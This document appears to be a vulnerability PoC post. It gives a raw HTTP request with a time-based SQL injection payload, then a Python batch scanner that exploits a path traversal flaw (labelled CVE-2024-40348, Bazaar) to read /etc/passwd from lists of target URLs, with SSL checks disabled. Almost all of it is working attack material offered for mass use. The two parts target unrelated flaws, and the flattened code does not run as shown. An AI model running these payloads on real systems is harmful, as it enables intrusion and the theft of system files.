GET /APPAccount/APPGetUser?name=1');WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
使用 PoC 批量扫描 (batch scanning with the PoC script below)
import urllib.request import urllib3 from urllib.parse import urljoin,quote import argparse import ssl import re # 禁用SSL证书验证,允许不安全的请求 ssl._create_default_https_context = ssl._create_unverified_context urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def read_file(file_path): # 读取文件中的URL列表 with open(file_path, 'r') as file: urls = file.read().splitlines() return urls def check(url): # 移除URL末尾的斜杠 url = url.rstrip("/") # 构造目标URL,尝试访问API文档中的敏感文件etc/passwd target = url+"/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd" headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" } try: # 发送GET请求 response = urllib.request.Request(target, headers=headers, method="GET", unverifiable=True) res = urllib.request.urlopen(response) status_code = res.getcode() content = res.read().decode() # 检查响应状态码和内容,判断是否成功读取到etc/passwd文件 if status_code == 200 and 'root:' in content and 'var' in content: print(f"\033[31mDiscovered:{url}: Bazaar_CVE-2024-40348_ArbiraryFileRead!\033[0m") return True except Exception as e: print(e) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", help="URL") parser.add_argument("-f", "--txt", help="file") args = parser.parse_args() url = args.url txt = args.txt if url: # 如果提供了单个URL,直接检查 check(url) elif txt: # 如果提供了包含多个URL的文件,逐个检查 urls = read_file(txt) for url in urls: check(url) else: # 如果没有提供任何参数,显示帮助信息 print("help")